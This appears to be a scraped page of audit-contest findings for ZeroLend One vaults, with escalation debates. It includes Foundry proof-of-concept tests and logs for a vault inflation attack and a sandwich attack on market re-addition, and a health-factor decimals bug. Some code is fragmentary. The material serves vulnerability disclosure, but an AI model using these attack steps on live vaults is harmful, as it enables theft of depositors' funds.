The morpho version that this code is based on has these values set to non-zero, which allows them to be protected against vault inflation attacks. However ZeroLend One has these values set to 0
meaning the vault inflation protection are not in place.
vm.startPrank(attacker); loanToken.approve(address(vault), type(uint256).max); collateralToken.approve(address(vault), type(uint256).max); vm.stopPrank(); // ERC4626Test context address, as vm.startPrank does not change the context msg.sender in the test file vm.startPrank(0x50EEf481cae4250d252Ae577A09bF514f224C6C4); loanToken.approve(0xC8011cB77CC747B5F30bAD583eABfb522Be25712, type(uint256).max); // market where we will be sending donation collateralToken.approve(0xC8011cB77CC747B5F30bAD583eABfb522Be25712, type(uint256).max); vm.stopPrank();
Declare the attacker address in BaseVaultTest.sol
contract under the other addresses:
address internal attacker = makeAddr('attacker');
Add the following function to ERC4626Test.sol
function testVaultInflationAttack() public { uint256 attackerAssets = 1e18+1; uint256 attackerDonation = 1e18; uint256 supplierAssets = 1e18;, attackerAssets);, supplierAssets); /// attacker front-run supplier, attackerDonation); // ERC4626Test context will perform the donation as vm.startPrank isn't changing msg.sender to attacker allMarkets[0].supplySimple(address(loanToken), address(vault), attackerDonation, 0); // supply vault market position console.log("attacker donates assets:", attackerDonation); vm.prank(attacker); uint256 attackerShares = vault.deposit(attackerAssets, attacker); console.log("attacker deposits underlying:", attackerAssets); console.log("attacker shares:", attackerShares);, 1e18); // same as attacker transfering, but having issue with foundry // attacker donation /// supplier deposit transaction vm.prank(supplier); uint256 supplierShares = vault.deposit(supplierAssets, supplier); console.log("supplier deposits underlying:", supplierAssets); console.log("supplier shares:", supplierShares); console.log("vault underlying:", vault.totalAssets()); console.log("vault shares:", vault.totalSupply()); }
Logs: attacker donates assets: 1000000000000000000 attacker deposits underlying: 1000000000000000001 attacker shares: 1 supplier deposits underlying: 1000000000000000000 supplier shares: 0 vault underlying: 3000000000000000001 vault shares: 1
As seen from the POC logs the depositor is minted 0 shares, and the attacker controls the singular share of the vault allowing them to redeem the share and get back their 2e18+1
attack funds and 1e18
of the supplier's funds. This is a clear loss of funds due to an inflation attack, leading to a High risk vulnerability as each vault will be vulnerable to this risk due to not utilising the Morpho vault inflation protections.
Foundry and Manual Review
Utilise the same values as Morpho for VIRTUAL_SHARES
library SharesMathLib { using MathLib for uint256; /// @dev The number of virtual shares has been chosen low enough to prevent overflows, and high enough to ensure /// high precision computations. /// @dev Virtual shares can never be redeemed for the assets they are entitled to, but it is assumed the share price /// stays low enough not to inflate these assets to a significant value. /// @dev Warning: The assets to which virtual borrow shares are entitled behave like unrealizable bad debt. uint256 internal constant VIRTUAL_SHARES = 1e6; /// @dev A number of virtual assets of 1 enforces a conversion rate between shares and assets when a market is /// empty. uint256 internal constant VIRTUAL_ASSETS = 1;
1 comment(s) were left on this issue during the judging contest.
Honour commented:
Invalid: misleading POC. Intentionally doesn't show attackers profit as it results in a loss of funds for attacker as well
DECIMAL_OFFSETS and virtual shares work hand in hand to combat first depositor inflation attacks, so I personally believe they are duplicates and under a single category of issues. Additionally, even if offset is zero and virtual shares is implemented, it can already make the attack non-profitable, so I would say the root cause here is the lack of implementation of a virtual share
If the offset is greater than 0, the attacker will have to suffer losses that are orders of magnitude bigger than the amount of value that can hypothetically be stolen from the user.
This "attack" result in a loss for both attacker and victim... I don't believe it is valid because IRL no one would pull of an attack where they loose funds as well, it can't even count as griefing.
Also the PoC is incomplete and misleading by omitting the fact that there's a huge loss for the attacker as well
per above comment
per above comment
You've created a valid escalation!
To remove the escalation from consideration: Delete your comment.
You may delete or edit your escalation comment anytime before the 48-hour escalation window closes. After that, the escalation becomes final.
Although the grief attack will also cause the malicious user to take losses, it is possible, and I think Medium severity is appropriate for this issue.
Planning to reject the escalation and leave the issue as is.
Has duplicates
Escalations have been resolved successfully!
Escalation status:
The immediate addition of assets from a new and re-added market with existing assets in vault's position will cause a significant financial loss for existing vault users as attackers will execute a sandwich attack to profit from the asset-share ratio changes.
The vulnerability stems from the immediate update of total assets when adding or re-adding a market with existing assets in the vault's position. This occurs in the _setCap method called by acceptCap:
withdrawQueue.push(pool); if (withdrawQueue.length > MAX_QUEUE_LENGTH) revert CuratedErrorsLib.MaxQueueLengthExceeded(); marketConfig.enabled = true; // Take into account assets of the new market without applying a fee. pool.forceUpdateReserve(asset()); uint256 supplyAssets = pool.supplyAssets(asset(), positionId); _updateLastTotalAssets(lastTotalAssets + supplyAssets);
This immediate update to assets is also reflected in the totalAssets() function, which sums the balance of all markets in the withdraw queue
function totalAssets() public view override returns (uint256 assets) { for (uint256 i; i < withdrawQueue.length; ++i) { assets += withdrawQueue[i].getBalanceByPosition(asset(), positionId); } }
The totalAssets() value is then used in share-to-asset conversions:
function _accruedFeeShares() internal view returns (uint256 feeShares, uint256 newTotalAssets) { newTotalAssets = totalAssets();
assets = _convertToAssetsWithTotals(shares, totalSupply(), newTotalAssets, MathUpgradeable.Rounding.Up);
This mechanism allows an attacker to observe the acceptCap transaction and execute a sandwich attack:
Deposit assets to receive X shares for Y assets before the market addition.
After the market addition increases total assets, withdraw the same X shares to receive Y + Δ assets, where Δ is determined by the new asset-to-share ratio.
No response
The existing vault users suffer a loss proportional to the size of the new/ re-added market's assets relative to the total vault assets before the addition. The attacker gains this difference at the expense of other users.
Isn't it impossible to add a market with existing funds?
A: No, it's actually possible and even anticipated in two scenarios:
Reintegrating a previously removed market with leftover funds, e.g. A market removed due to an issue, but not all funds were withdrawn.
Adding a new market that received donations to the vaults position directly via the pool contract.
The contract specifically accounts for these cases by not charging fees on these pre-existing funds, as shown by the comment in the code // Take into account assets of the new market without applying a fee.
Why is this vulnerability critical?
A: It's critical because:
It directly risks funds belonging to existing users which were lost when a market had to be removed with leftover funds.
Even donations loss can be considered as a loss for existing users.
No response
In case of adding a market with existing funds, consider gradual unlocking of assets over a period of time.
request poc
PoC requested from @0xNirix
Requests remaining: 13
Here is the POC code and result
pragma solidity ^0.8.0; import './helpers/BaseVaultTest.sol'; import {CuratedErrorsLib, CuratedEventsLib, CuratedVault, PendingUint192} from '../../../../contracts/core/vaults/CuratedVault.sol'; import {CuratedVaultFactory, ICuratedVaultFactory} from '../../../../contracts/core/vaults/CuratedVaultFactory.sol'; uint256 constant TIMELOCK = 1 weeks; contract CuratedVaultSandwichTest is BaseVaultTest { using MathLib for uint256; ICuratedVault internal vault; ICuratedVaultFactory internal vaultFactory; ICuratedVaultFactory.InitVaultParams internal defaultVaultParams; address attacker; address user; function setUp() public { \_setUpBaseVault(); \_setUpVault(); attacker = makeAddr("attacker"); user = makeAddr("user"); // Setup initial cap for all \_setCap(allMarkets[0], 600 ether); \_setCap(allMarkets[1], 600 ether); \_setCap(allMarkets[2], 600 ether); // Set supply queue to use both markets IPool[] memory newSupplyQueue = new IPool[](2); newSupplyQueue[0] = allMarkets[0]; newSupplyQueue[1] = allMarkets[1]; vm.prank(allocator); vault.setSupplyQueue(newSupplyQueue); // Mint tokens to users deal(address(loanToken), user, 1000 ether); deal(address(loanToken), attacker, 1000 ether); // Approve vault to spend user's tokens vm.prank(user); loanToken.approve(address(vault), 1000 ether); vm.prank(attacker); loanToken.approve(address(vault), 1000 ether); } function \_setUpVault() internal { // copied from Integration Vault Test CuratedVault instance = new CuratedVault(); vaultFactory = ICuratedVaultFactory(new CuratedVaultFactory(address(instance))); // setup the default vault params address[] memory admins = new address[](1); address[] memory curators = new address[](1); address[] memory guardians = new address[](1); address[] memory allocators = new address[](1); admins[0] = owner; curators[0] = curator; guardians[0] = guardian; allocators[0] = allocator; defaultVaultParams = ICuratedVaultFactory.InitVaultParams({ revokeProxy: true, proxyAdmin: owner, admins: admins, curators: curators, guardians: guardians, allocators: allocators, timelock: 1 weeks, asset: address(loanToken), name: 'Vault', symbol: 'VLT', salt: keccak256('salty') }); vault = vaultFactory.createVault(defaultVaultParams); vm.startPrank(owner); vault.grantCuratorRole(curator); vault.grantAllocatorRole(allocator); vault.setFeeRecipient(feeRecipient); vault.setSkimRecipient(skimRecipient); vm.stopPrank(); \_setCap(idleMarket, type(uint184).max); loanToken.approve(address(vault), type(uint256).max); collateralToken.approve(address(vault), type(uint256).max); vm.startPrank(supplier); loanToken.approve(address(vault), type(uint256).max); collateralToken.approve(address(vault), type(uint256).max); vm.stopPrank(); vm.startPrank(onBehalf); loanToken.approve(address(vault), type(uint256).max); collateralToken.approve(address(vault), type(uint256).max); vm.stopPrank(); } function \_setCap(IPool pool, uint256 newCap) internal { // largely copied from IntegrationVaultTest.sol uint256 cap = vault.config(pool).cap; bool isEnabled = vault.config(pool).enabled; if (newCap == cap) { console.log("New cap is the same as current cap, returning"); return; } PendingUint192 memory pendingCap = vault.pendingCap(pool); if (pendingCap.validAt == 0 || newCap != pendingCap.value || true) { vm.prank(curator); vault.submitCap(pool, newCap); } vm.warp(block.timestamp + vault.timelock()); if (newCap > 0) { vault.acceptCap(pool); if (!isEnabled) { IPool[] memory newSupplyQueue = new IPool[](vault.supplyQueueLength() + 1); for (uint256 k; k < vault.supplyQueueLength(); k++) { newSupplyQueue[k] = vault.supplyQueue(k); } newSupplyQueue[vault.supplyQueueLength()] = pool; vm.prank(allocator); vault.setSupplyQueue(newSupplyQueue); } } } function testSandwichAttackOnMarketReaddition() public { // Initial deposit by a user vm.prank(user); vault.deposit(800 ether, user); // Log state console.log("Total initial assets:", vault.totalAssets()/ 1 ether, "ether"); console.log("User shares:", vault.balanceOf(user) / 1 ether, "ether"); console.log("User assets:", vault.convertToAssets(vault.balanceOf(user))/ 1 ether, "ether"); // First market had to be removed due to issues. \_setCap(allMarkets[0], 0); vm.startPrank(curator); vault.submitMarketRemoval(allMarkets[0]); vm.stopPrank(); vm.warp(block.timestamp + vault.timelock() + 1); vm.startPrank(allocator); uint256[] memory withdrawQueue = new uint256[](3); // the index of first market is 1 in withdrawal queue as setup in basevaulttest withdrawQueue[0] = 0; withdrawQueue[1] = 2; withdrawQueue[2] = 3; vault.updateWithdrawQueue(withdrawQueue); vm.stopPrank(); // Attacker deposits just before market is re-added vm.prank(attacker); uint256 attackerShares = vault.deposit(300 ether, attacker); console.log("Attacker initial deposit: 300 ether"); console.log("Attacker shares received: ", attackerShares/ 1 ether, "ether"); // Re-add the removed market back which had assets \_setCap(allMarkets[0], 600 ether); // Attacker withdraws vm.prank(attacker); uint256 withdrawnAssets = vault.redeem(attackerShares, attacker, attacker); console.log("Attacker assets withdrawn after market readdition: ", withdrawnAssets/ 1 ether, "ether"); console.log("Attacker profit: ", (withdrawnAssets - 300 ether) / 1 ether, "ether"); // Check the impact on the user uint256 userShares= vault.balanceOf(user); uint256 userAssetsAfter = vault.convertToAssets(userShares); console.log("After attack, User assets: ", userAssetsAfter/ 1 ether, "ether"); console.log("After attack, User loss: ", (800 ether - userAssetsAfter)/ 1 ether, "ether"); // Log final state console.log("Total assets after attack:", vault.totalAssets()/ 1 ether, "ether"); } }
Log output
Total initial assets: 800 ether
User shares: 800 ether
User assets: 800 ether
Attacker initial deposit: 300 ether
Attacker shares received: 1199 ether
Attacker assets withdrawn after market readdition: 659 ether
Attacker profit: 359 ether
After attack, User assets: 440 ether
After attack, User loss: 359 ether
Total assets after attack: 440 ether
The user's 800 shares, which originally represented 800 ether, now only represent 440 ether even though no actual fund is lost as market has recovered.
The user has effectively lost 359 ether, which is exactly the amount the attacker gained.
The report claims this issue is valid due to the following reasons
Isn't it impossible to add a market with existing funds?
A: No, it's actually possible and even anticipated in two scenarios:
Reintegrating a previously removed market with leftover funds, e.g. A market removed due to an issue, but not all funds were withdrawn.
Adding a new market that received donations to the vaults position directly via the pool contract.The contract specifically accounts for these cases by not charging fees on these pre-existing funds, as shown by the comment in the code // Take into account assets of the new market without applying a fee.
Why is this vulnerability critical?
A: It's critical because:It directly risks funds belonging to existing users which were lost when a market had to be removed with leftover funds.
Even donations loss can be considered as a loss for existing users.
I believe this report is invalid for the following reasons
on adding/removing markets with existing funds
function for this exact purpose to transfer all funds from a pool before removal, because removing a pool with existing funds will lead to a loss for the depositors.on donations
The report claims this issue is valid due to the following reasons
Isn't it impossible to add a market with existing funds?
A: No, it's actually possible and even anticipated in two scenarios:
Reintegrating a previously removed market with leftover funds, e.g. A market removed due to an issue, but not all funds were withdrawn.
Adding a new market that received donations to the vaults position directly via the pool contract.The contract specifically accounts for these cases by not charging fees on these pre-existing funds, as shown by the comment in the code // Take into account assets of the new market without applying a fee.
Why is this vulnerability critical?
A: It's critical because:It directly risks funds belonging to existing users which were lost when a market had to be removed with leftover funds.
Even donations loss can be considered as a loss for existing users.I believe this report is invalid for the following reasons
on adding/removing markets with existing funds
- There is a
function for this exact purpose to transfer all funds from a pool before removal, because removing a pool with existing funds will lead to a loss for the depositors.- The removal and addition of markets are admin functionalities and we can assume that the admin will follow the right process to prevent losses to users.
on donations
- Market donations fall under the user mistakes category, as donated funds are lost any ways. Donations can happen regardless of whether a new market is being added or not and a watcher can take advantage of the increase in totalAssets to extract some value , this does not affect existing users negatively as they also benefit from said donations.
You've created a valid escalation!
To remove the escalation from consideration: Delete your comment.
You may delete or edit your escalation comment anytime before the 48-hour escalation window closes. After that, the escalation becomes final.
Absolutely, vault allocator will try to withdraw from pools via reallocate before removing a pool. However, it is not possible in all scenarios. There might be a number of reasons for withdrawals to not happen or to be incomplete e.g. complete withdrawal amount not available in pool or any configuration changes by pool managers e.g. freezing the reserves. Pool managers cannot be trusted by vault managers according to README.
There are two set of actors. Actors who manage pools and actors who mange vaults. If an action done by one party causes the other party to suffer losses we'd want to consider that.
The code specifically tries to handle such scenarios further indicating they are completely intentional:
if (pool.supplyShares(asset(), positionId) != 0) { if (config[pool].removableAt == 0) revert CuratedErrorsLib.InvalidMarketRemovalNonZeroSupply(pool); if (block.timestamp < config[pool].removableAt) { revert CuratedErrorsLib.InvalidMarketRemovalTimelockNotElapsed(pool); } }
In this code, after timelock expiry (removableAt) pool with assets will be removed.
pool.forceUpdateReserve(asset()); uint256 supplyAssets = pool.supplyAssets(asset(), positionId); \_updateLastTotalAssets(lastTotalAssets + supplyAssets);
However, this creates a vulnerability: An attacker can exploit this process to steal a majority of these funds, as demonstrated in the provided Proof of Concept (POC).
I believe the main factor that validates this issue is the lack of trust between vault managers and pool managers:
There are two set of actors. Actors who manage pools and actors who mange vaults. If an action done by one party causes the other party to suffer losses we'd want to consider that.
When a pool with remaining assets is removed and later reintegrated, its assets can be exploited and stolen through this vulnerability. The key point is that vault and pool actors do not trust each other, which leaves room for such vulnerabilities.
Planning to reject the escalation and leave the issue as is.
Hi @cvetanovv this is an invalid issue because the protocol works exactly how it's meant to.
When removing a pool, the curator should reallocate the assets of the pool into a different pool before removing it. If this correct order is followed, the issue does not arise.
Now the watson has stated in the comments (not the original report) that there are some cases where pool managers are malicious and freeze reserves so reallocation is not possible. In that case, if the pool is malicious, its irrational for curators to add the same pool back after removing it. So again, the issue won't occur.
Furthermore, if they know the freezing is going to be temporary, then they wouldn't remove the funds from the pool in the first place. If they do so, it's incorrect actions by the vault curator causing harm to vault depositors.
The above comment trying to invalidate the issue is incorrect. In fact, the curator would want to re-add the pool, once pool becomes available again, so as to recover the funds. Moreover, freezing and unfreezing reserves isn't necessarily indicative of malicious behavior; it can be part of normal operational procedures or some requirements (e.g. regulatory) for pool owners.
Freezing reserves does not prevent withdrawals though, you can check the executeWithdraw and validateWithdraw functions, freeing only prevents supply.
So claims relying on freezing are invalid in this case.
If a pool is so compromised that it cannot be withdrawn from, then it doesn't makes sense for it to be added again. If it's a temporary compromise then the pool can just be shifted to be bottom of the withdraw queue (there's a functionality for this), instead of removing and loosing users funds. _normal operational procedures_ (as claimed in the above comment) should not be reason for removing a pool without properly reallocating funds since these are obviously temporary
If a pool is so compromised that it cannot be withdrawn from, then it doesn't makes sense for it to be added again
My point is that you as a curator still want to add the pool back to recover your funds when (and if) the pool becomes withdraw-able again. You can anyways restrict any new deposit from going to the pool, so you only expect to gain back the funds. Please remember curator does not control pool's manager action and cannot guess whether it is a temporary or permanent change.
My point is that you as a curator still want to add the pool back to recover your funds when (and if) the pool becomes withdraw-able again.
Pool funds not being withdrawable does not mean it's compromised, and does not require drastic actions (e.g. removal) that risks users funds, lack of liquidity ( due to borrowing) can make a pool temporarily un-withdrawable. In this case the pool can be moved to the bottom of the withdraw queue until it has liquidity.
Vault admins are expected to know this and act rationally
I think we are going in a bit of circles here, but please allow me to frame the argument again:
It does not matter if the pool is compromised or not, or vault curator would be able to ascertain whether it is a temporary or permanent situation (which they can not always due to lack of control on pool owners actions, and vault curators have a limit on pools they can keep around in the withdraw queue).
In any case, including the compromised pool case, if and when the vault owner sees an opportunity to get back the funds by re-adding the pool, they must do the re-addition. They would want to withdraw back their funds and can limit any further deposit.
That is precisely why the code exists in the first place in the addition flow, that explicitly adds back the account assets from the pool. There is even a comment saying no fee should be charged from these assets because you do not want to charge a fee on the entire principal that was lost (fees are only charged on interests). This further indicates an intentional and conscious re-addition of funds, where the vulnerability lies.
// Take into account assets of the new market without applying a fee. pool.forceUpdateReserve(asset()); uint256 supplyAssets = pool.supplyAssets(asset(), positionId); \_updateLastTotalAssets(lastTotalAssets + supplyAssets);
My point is that curators can be trusted to not remove pools with user funds unless there is a security risk involved for the vault itself (i.e. vault can be exploited via pool) , in which case the pool cannot be re-added due to said security risk.
Any other inconvenience can be fixed by reallocating the funds before removal or rearranging the withdraw queue.
The code is safely accounting for funds as donations are always possible
My point is that curators can be trusted to not remove pools with user funds unless there is a security risk involved for the vault itself (i.e. vault can be exploited via pool) , in which case the pool cannot be re-added due to said security risk.
Absolutely my point as well, the re-addition applies to the compromised pools as well. Even if there was a security risk, that may get possibly resolved in future. Pease note the pools can be upgradeable according to Zerolend docs.
Any other inconvenience can be fixed by reallocating the funds before removal or rearranging the withdraw queue.
Incorrect, like I mentioned in my previous comment, vault curators have a limit on pools in the withdraw queue and they may not be able to keep waiting by parking pools in withdraw queue for pool owner to take some action.
The code is safely accounting for funds as donations are always possible
The whole vulnerability is that the code infact fails to safely add funds while re-adding, whether they are donations or past deposits.
Absolutely my point as well, the re-addition applies to the compromised pools as well. Even if there was a security risk, that may get possibly resolved in future
Can you please provide a valid example of such a "compromise" that would cause a curator to remove a pool and re-added later.
I believe you are yet to mention anything specific, besides freezing reserves, which is invalid.
Incorrect, like I mentioned in my previous comment, vault curators have a limit on pools in the withdraw queue and they may not be able to keep waiting by parking pools in withdraw queue for pool owner to take some action.
This situation is very unlikely (even acknowledged by you, previously) that at at best only 1 or 2 pools can be experiencing it at any point in time. "parking pools" is obviously a stretch
I was merely responding to your previous comment
My point is that curators can be trusted to not remove pools with user funds unless there is a security risk involved for the vault itself (i.e. vault can be exploited via pool) , in which case the pool cannot be re-added due to said security risk.
Even in these cases, you may want to add back the pool when the security risk gets resolved e.g. via upgrade.
This situation is very unlikely (even acknowledged by you, previously) that at at best only 1 or 2 pools can be experiencing it at any point in time. "parking pools" is obviously a stretch
I don't see any of my comment saying this is unlikely. Anyways, even if 1 or 2 pools are impacted, they can still cause this issue if the vault is already running close to the withdraw queue limit which is rather small (30).
At this point of time, I think this exchange is not making progress and converging and we are repeating same set of arguments. Will wait for HoJ to step in.
I agree with @0xNirix points.
The re-addition of a pool, even after encountering issues, is possible. Vault curators don’t have control over pool manager actions, so re-adding a previously removed pool when it becomes withdrawable again is also possible.
When pools are removed and then re-added, this vulnerability emerges due to the way assets are immediately accounted for. This means that there is a real edge case for this attack to happen without the curator making a mistake.
Planning to reject the escalation and leave the issue as is.
@cvetanovv This issue is invalid.
The issue requires that the curator removes a pool WITHOUT reallocating all the assets out of it. This makes 0 sense to do since the vault is forfeiting all the depositors assets in that pool. Pools with assets should never be removed temporarily, there is no valid reason to do so.
Even if the pool is somehow compromised, the curator should first try to reallocate any funds out of the pool and then set the cap to 0 to prevent further deposits but still allow withdrawals from that pool.
The report describes a scenario where the vault curator makes a mistake that causes fund loss to vault depositors, which is not a valid issue.
All the points in above comment have already been discussed in this thread. Please do not repeat arguments just trying to invalidate the issue.
Even if the pool is somehow compromised, the curator should first try to reallocate any funds out of the pool and then set the cap to 0 to prevent further deposits but still allow withdrawals from that pool.
As a curator, you would definitely not want to keep a pool which is compromised (and may have any vulnerability including in the withdrawal path) attached to your vault in any way.
In fact, you would remove it right away and see if the pool owner can potentially resolve it and then re-add the pool so that you can get back your funds, once it is safe.
The reason I believe this issue is invalid is because under current pool and vault implementation there's no valid compromise that would require a pool to be removed without reallocating funds and then re-added later
@0xNirix has not been able to provide a valid situation where such a process is the only solution.
The reason for that is obviously because such a situation does not exist and the entire issue is based on a hypothetical unspecified compromise
Of course @0xNirix can provide a plausible example if there is one.
This is amusing. First you guys yourselves bring up "compromise" scenarios that according to you are feasible but does not apply here, trying to invalidate the issue. The ones where you think it may warrant removal of pool with assets but no re-addition or even no removal in the first place, and when I counter that even in such conditions you may have to remove and re-add, you go back and ask where is the scenario?
Let me clarify for one last time what I have already mentioned clearly in my comments earlier. My stand from day one has been that it is perfectly feasible for a curator to remove pools with assets for both non-compromised or compromised scenarios. One such scenario I had mentioned was when the pool may be non-withdrawable for a long time as no repayments are done. Pool owner may further aggravate this situation by freezing assets so no more deposits can come. Curator does not know if repayments will ever come or if pool owner will ever remove freeze to allow more deposits. They may take a rational decision to write off this bad debt for the moment. This is a standard practice that is done by even physical banks. Why? Because you do not want to impact your new depositors when you know with whatever information you have that part of your assets may not be returned. Otherwise you risk lowering their final yield by socializing old losses with new depositors, eventually discouraging new vault depositors. However, in this particular case, vault has a real limitation that will force curator to remove such pools with assets from the withdraw queue even earlier. This because a vault can only keep limited (up to 30 pools) in its withdraw queue, so if a vault is running near its capacity of 30 pools and even one pool has some issues they may be forced to take such call sooner than later. Now, if the pool owner decides to allow deposits again, curator will see a chance to get their funds back and hence would want to re-add the pool. This is just one scenario but all the compromise scenarios that you thought do not apply but are feasible are actually applicable too and there is real risk of vault losing funds because of this vulnerability in many such scenarios overall.
Will wait for HoJ to take a final call.
@0xNirix it is your report that first mentions an issue but fails to provide a valid example as we see here
Isn't it impossible to add a market with existing funds?
A: No, it's actually possible and even anticipated in two scenarios:
Reintegrating a previously removed market with leftover funds, e.g. A market removed due to an _issue_, but not all funds were withdrawn.
My stand from day one has been that it is perfectly feasible for a curator to remove pools with assets for both non-compromised or compromised scenarios
No rational curator would remove a pool for non-compromised scenarios, this is because users who withdraw before the pool is re-added would definitely suffer a loss and waiting for the pool to be re-added is not an option as they don't know when it'll be added or if it ever will be.
Pool removal with leftover funds is a last resort solution due to this reason and should not be taken lightly
One such scenario I had mentioned was when the pool may be non-withdrawable for a long time as no repayments are done. Pool owner may further aggravate this situation by freezing assets so no more deposits can come. Curator does not know if repayments will ever come or if pool owner will ever remove freeze to allow more deposits. They may take a rational decision to write off this bad debt for the moment.
This scenario is invalid, if a pool is non-withdrawable due to lack of funds, even if the pool owner freezes the asset repayments will still be possible because freezing does not affect repayments. In this scenario a rational curator will simply reorder the withdraw queue and wait for those repayments instead of removing the market and costing users their funds.
It is very obvious that currently this issue has no possible scenario, and also obvious that it cannot be medium severity
@Honour-d-dev, please read my entire comment. I have clearly explained why it may be necessary and rational for a curator to remove a pool rather than simply reorder it.
@cvetanovv, I apologize for this late request, but upon further consideration, I believe this issue should be upgraded to High. The impact of this issue is very similar to issue #233, which was judged high, where a pool owner could maliciously set incorrect interest rates causing withdrawals to revert. Eventually, a curator would reasonably consider such funds lost and remove the pool. They would need to remove such failing pools from their withdrawal queues for the reasons I explained in\#issuecomment-2432814025: to prevent losses to the new depositors and/or due to withdrawal queue limitations. Later, the pool owner could correct the interest rate, and the curator would want to re-add the pool to the vault. However, the pool owner would then execute this attack from a different wallet. The impact would be identical - loss of vault funds that were in the pool, and the pool owner could even claim they have no malicious intent.
@Honour-d-dev, please read my entire comment. I have clearly explained why it may be necessary and rational for a curator to remove a pool rather than simply reorder it.
I read your comment, I believe the 30 pool limit is not a valid reason either. Reordering to preserve users funds if possible should have more priority over adding new pools. If a pool already has 30 pools in it and one is temporarily non-withdrawable, surely there're 29 other working pools, no?
a pool owner could maliciously set incorrect interest rates causing withdrawals to revert. Eventually, a curator would reasonably consider such funds lost and remove the pool. They would need to remove such failing pools from their withdrawal queues for the reasons I explained in\#issuecomment-2432814025: to prevent losses to the new depositors and/or due to withdrawal queue limitations. Later, the pool owner could correct the interest rate, and the curator would want to re-add the pool to the vault.
This example is also invalid , a rational curator would never re-add a pool with a malicious pool owner that can set incorrect interest rates, whether they choose to correct the rates or not. The security risks are vey obvious from adding such a pool.
@cvetanovv This issue does not even meet medium severity, i think it's obvious at this point that there is no valid scenario where such a thing is the only rational choice, judging by how difficult it is for @0xNirix to provide one.
There are only 2 possible cases here
Here we go again in circles!
I read your comment, I believe the 30 pool limit is not a valid reason either. Reordering to preserve users funds if possible should have more priority over adding new pools. If a pool already has 30 pools in it and one is temporarily non-withdrawable, surely there're 29 other working pools, no?
Please stop replying to only part of the argument. I will just repeat - please re-read the entire comment again to see why curator may rationally decide to remove a pool.
This example is also invalid , a rational curator would never re-add a pool with a malicious pool owner that can set incorrect interest rates, whether they choose to correct the rates or not. The security risks are vey obvious from adding such a pool.
Probably repeating this for the nth time as well - how does curator know that pool owner is malicious or simply made a mistake?
And even if malicious pool owner, why not, if curator can very well ensure that there is no downside (because no new deposit would go to the pool) and there is only upside (can potentially get funds back).
if a pool/pool admin is malicious and cannot be withdrawn from, it should be removed and never re-added (it makes no sense to re-add a malicious pool even if it appears to be working correctly)
If the pool is not compromised but temporarily non-withdrawable it should be reordered instead of removed ( because removing might still cost some users their funds an i stated\#issuecomment-2433201858)
I have given examples for both these cases with clear reasons on how a curator might end up removing and then re-adding pool. It should be pretty obvious that this is an High issue, given other similar judgements.
This issue is not High severity. To be High severity, we should not have any restrictions. Only the fact that the attack is only possible with certain curator actions makes this a Medium/Low severity.
The core of the issue lies in the lack of a clear mechanism to prevent sandwich attacks when adding or re-adding pools with existing funds.
There are a few scenarios where re-adding a previously removed pool—either compromised or non-withdrawable due to temporary liquidity constraints. And the curators can’t control pool management actions. Attackers could exploit the updated asset-share ratio post-addition to profit at the expense of existing users.
Given these factors, I agree that this is a valid concern and can be Medium severity.
Escalations have been resolved successfully!
Escalation status:
contract assumes all price feeds has the same decimals but is a wrong assumption that leads to an incorrect health factor math.Source:
000000, A2-security, Honour, Obsidian, coffiasd, iamnmt, nfmelendez, silver_eth, stuart_the_minion
Mixing price feeds decimals when doing the calculation of totalCollateralInBaseCurrency
and totalDebtInBaseCurrency
will cause an incorrect healthFactor
affecting important operations of the protocol such as liquidation
, borrow
and withdraw
. GenericLogic.sol
contract assumes all price feeds have the same decimals but is a wrong assumption as is demonstrated in the Root cause section.
GenericLogic.sol:69 calculateUserAccountData
calculates the totalCollateralInBaseCurrency
and the totalDebtInBaseCurrency
doing a sum of all the differents reserve assets as collateral or debt in base currency but the problem is a wrong assumption that all chainlink price feeds has the same decimals. Most USD price feeds has 8 decimals but for example AMPL / USD feed has 18 decimals. So totalCollateralInBaseCurrency
and the totalDebtInBaseCurrency
will be incorrect because calculateUserAccountData
will sum asset prices with different decimals leading to a wrong calculation of the health factor and incorrect function of many protocol operations.
Price feeds for collateral or debt assets in a given position needs to have different decimals.
Is a wrong assumption proven by example
Liquidation: Mixing Price decimals lead to incorrect calculation of the healthFactor
that is a result of wrong totalCollateralInBaseCurrency
and the totalDebtInBaseCurrency
Borrow: Wrong healthFactor
also affects borrowing when doing validations to make sure that the position is not liquiditable.
Withdraw: Also uses healthFactor
via ValidationLofic::validateHFAndLtv
executeUseReserveAsCollateral: Also uses healthFactor
via ValidationLofic::validateHFAndLtv
Any other operation that uses the health factor.
There are 2 possible solution:
Some protocols enforce 8 decimals when assigning an oracle to an asset or reject the operation. (easy, simple, secure, not flexible)
Use AggregatorV3Interface::decimals to normalize to N decimals the price making sure that the precision loss is on the correct side. (flexible)
As seen here
Q: Are there any limitations on values set by admins (or other roles) in protocols you integrate with, including restrictions on array lengths?
There is no limits to admin set chainlink oracles, so it is presumed that they will act accordingly when integrating tokens.
(External) Admin trust assumptions: When a function is access restricted, only values for specific function variables mentioned in the README can be taken into account when identifying an attack path.
If no values are provided, the (external) admin is trusted to use values that will not cause any issues.
this issue is valid!
The above comment is not a valid reason for it to be invalid, pools are permissionless and anyone can create a pool and choose to integrate these tokens with un-conventional price feed decimals and the impact on users can be severe especially if not detected early.
If the argument is that the oracle can be removed or the token can be paused by admin if such an issue occurs, the impact is still severe (loss of funds for users , liquidation etc) and not reversible. Such cases can be easily prevented by the mitigation provided in the report.
this issue is valid!
The above comment is not a valid reason for it to be invalid, pools are permissionless and anyone can create a pool and choose to integrate these tokens with un-conventional price feed decimals and the impact on users can be severe especially if not detected early.
If the argument is that the oracle can be removed or the token can be paused by admin if such an issue occurs, the impact is still severe (loss of funds for users , liquidation etc) and not reversible. Such cases can be easily prevented by the mitigation provided in the report.
You've created a valid escalation!
To remove the escalation from consideration: Delete your comment.
You may delete or edit your escalation comment anytime before the 48-hour escalation window closes. After that, the escalation becomes final.
The Lead Judge is right with his comment:\#issuecomment-2388428543
In addition, pool managers are expected to act rationally(i.e. are trusted):
Essentially we expect all permissioned actors to behave rationally.
There are two set of actors. Actors who manage pools and actors who mange vaults. If an action done by one party causes the other party to suffer losses we'd want to consider that.
The only valid variant of this issue is if there was mention of the malicious attack path. Then, I would duplicate it with #234.
Planning to reject the escalation and leave the issue as is.
The point here is pool creation is permissionless, so anyone can create a pool (become a pool manager) and add whichever tokens they like to their pool. The possibility of adding an oracle with wrong decimals cannot be attributed to irrational behavior(or being malicious) as there is no guarantee that the pool manager is aware of the fact that price feed decimals are not normalized (see second recommendations #166 and #442 ) in zerolend.
